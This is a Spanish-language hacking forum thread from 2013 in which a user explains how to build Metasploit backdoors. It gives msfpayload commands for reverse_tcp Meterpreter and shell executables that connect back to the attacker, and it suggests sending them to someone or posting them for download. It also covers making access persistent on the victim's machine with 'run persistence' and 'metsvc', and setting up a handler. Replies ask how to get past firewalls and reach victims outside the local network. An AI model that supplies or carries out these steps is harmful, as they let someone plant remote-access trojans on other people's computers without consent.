comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Como crear backdoors en metasploit.[Algunos tipos]

  • 4 Respuestas
  • 4256 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado J0k3$

  • *
  • Underc0der
  • Mensajes: 11
  • Actividad:
    0%
  • Reputación 0
  • Si juegas con el mejor , mueres como los demas.
    • Ver Perfil
    • Email
  • Skype: eltirador1996
« en: Agosto 18, 2013, 11:09:09 pm »

¿Que es una backdoor?
Es un programa, que ayuda al atacante a tener un acceso al pc, constante , o a dejar accesos a otros intrusos , por cualquier cuestión , es algo que deja vulnerado a tu pc al 100%.

Backdoor Meterpreter

Hoy os enseñare a hacer backdoors con metasploit, los distintos backdoors que hay :-D empecemos...Aclaro una cosa, con cualquier payload de meterpreter puedes hacer backdoor's acá les explicare unos cuantos , pero es para que investiguen ustedes :-D....
Backdoor Meterpreter.
Este backdoor, es del meterpreter para el que no sepa que es, es el "troyano" que usa metasploit,  digo troyano porque trae unas funciones añadidas, en mi opinión el mas recomendable de los backdoor ... Empecemos se crea de una forma muy sencilla ..... abren la consola y escriben...

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
sudo msfpayload windows/meterpreter/reverse_tcp LHOST="Ip/No-Ip" LPORT="Puerto" X > "Ruta donde se guardara/Elnombrequequieras.exe"

Bueno , seria el típico Backdoors , seria subírselo a alguien o ponerlo para descargar y finiquitado :-D , bueno y ahora te estarás preguntando......como recibo yo la conexión de este backdoor y de cualquiera de los que veremos hoy, con el exploit, que se llama "exploit/multi/handler" con eso recibiremos todas las conexiones de nuestro backdoor, veamos un ejemplo de recibir conexiones....




Lo ven? consiguió una sesión , sencillo no? :-) , bueno este seria uno de los backdoors que hay, expliquemos unos cuantos mas ;-)

Backdoors Consola.
Este backdoor, tan simple te da la consola/terminal/prompt bueno cualquier interprete de comandos que allá en el S.O este es sencillo .....

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
msfpayload windows/shell/reverse_tcp LHOST="Tu ip/noip" LPORT="Puerto" X > "ruta/elnombrequequieras.exe"
y ya esta ahora os enseño una foto de como sería....Ya saben se tiene que ejecutar en la "maquina victima".

Bueno, aquí se ve la shell obtenida! :D ...pasemos a otro...

Backdoor Persistence.
Este backdoor es persistence, un comando que trae el meterpreter , podemos ver los comandos poniendo "run persistence -h" dentro del meterpreter.....

Hay ven la información sencillo no? :D bueno pues esto se usa para darnos acceso constante a una maquina, o yo tambien la uso para darme acceso a mi mismo tener varias sesiones por si falla alguna , jeje soy malvado xD jaja :D bueno para usar este comando como ven hay en los parametros solamente pondremos..
     
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
run  persistence -U -i -p 1234 -r "ip" Bueno analizamos un poco, la "-U" es para que cuando el usuario inicie, lo haga también nuestra backdoors , la "-i" es el intervalo de conexión en este caso ninguno , la "-p" el puerto  inventado hay pongan el que tengan abierto xD :D  , y la "-r" es para la ip/noip a la que se le va a conectar la suya o la de su amigo para darle acceso ..... y les sale algo parecido a esto...

Bueno hay se ve, como lo pone en el registro, la pid ...etc bueno y como vemos si nos fijamos bien usa el backdoor meterpreter (PAYLOAD) del que os hable antes :-D lo pueden modificar , en la ruta del script y cambiarlo por el que quieran como una VNC o algo así .... :-D
Despues en un handler  , y el payload de el primer backdoor.... como el que vimos colocamos los datos en ese caso (el de la foto) pondríamos de LHOST 192.168.1.87 y en el del puerto 4443 , y nos daría la sesión cuando se conectara :D.......

Backdoors Metsvc.

Este es mas fácil que el otro , porque es un servicio que se instala en la pc victima, y con solo poner en meterpreter este comando.....
run metsvc -A
y ya se les instalaría solo , si ponen run metsvc -h , verán que hay muy pocos comando solo ese y 2 mas y uno es para desinstalar el servicio , muy útil , bueno acá unas fotos de como se instala automáticamente ....


Bueno , para interactuar con este, colocan el handler pero de payload ponen :

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
set PAYLOAD windows/metsvc_bind_tcp
y rellenan los datos correspondientes... :-) con show options , y lo configuran..


Saludos de vuestro amigo J0K3$, y muchas gracias al amigo de Antrax. Salu2 Underc0der.

 No se dejen nada abierto ;D
« Última modificación: Agosto 09, 2014, 09:43:09 am por Expermicid »
Dueño de The Hackers Wars : No tienes permisos para ver links. Registrate o Entra con tu cuenta
-----------------------------------------

Desconectado Ricardini

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: system_security@live.com
« Respuesta #1 en: Agosto 22, 2013, 09:22:32 am »
sabes eludir el firewall activo me podrias decir como le haces le pongo este payload y nada

windows/meterpreter/reverse_tcp_allports

Desconectado pelumon

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #2 en: Septiembre 23, 2013, 11:20:41 pm »
esto es para local host?? pero para host extrenos como se hace?? se que ahy que cambiar ip privada por la ip extrena pero ya lo e intentado y no eh podido mas que en lhost. buena info!! salu2!1

Desconectado TrollMine

  • *
  • Underc0der
  • Mensajes: 47
  • Actividad:
    0%
  • Reputación 0
  • GEEK POWER
    • Ver Perfil
    • Twitter
  • Skype: trollmine99
« Respuesta #3 en: Septiembre 25, 2013, 11:39:17 am »
Abre los puertos pelumon, y te tiene que ir si o si, a no ser, que metasploit lo tengas en una maquina virtual, entonces:
Skype: trollmine99

Desconectado pelumon

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #4 en: Septiembre 26, 2013, 01:42:08 am »
ise un ejecutable y si me funciono con red diferente, entro a mi router y pongo mi maquina en dnz y ahora si en set lhost pongo mi ip extrena y funciona, pero no me pasa lo mismo con set solo me funciona en lhost?? sabes como??? salu2!!!

 

¿Te gustó el post? COMPARTILO!



Como usar Google DoSear contra sitios web alojados en grandes dominios

Iniciado por Pr0ph3t

Respuestas: 1
Vistas: 2010
Último mensaje Mayo 04, 2012, 12:12:50 am
por Cronos
Como controlar el trafico aereo gracias al hacking de buscadores

Iniciado por Rootkit_Pentester

Respuestas: 7
Vistas: 2855
Último mensaje Abril 22, 2017, 04:38:16 pm
por GotKiller_22
Como tomar control de un dispositivo Android en menos de 1 minuto

Iniciado por ANTRAX

Respuestas: 15
Vistas: 10415
Último mensaje Junio 19, 2017, 04:20:24 pm
por subl3tt
El caso de la red Zello o como intervenir comunicaciones en red social

Iniciado por Rootkit_Pentester

Respuestas: 6
Vistas: 817
Último mensaje Julio 11, 2018, 07:00:30 pm
por Rootkit_Pentester
Mr looquer o tambien conocido como el Shodan de IPV6

Iniciado por Rootkit_Pentester

Respuestas: 1
Vistas: 1556
Último mensaje Enero 13, 2017, 06:17:21 pm
por Bael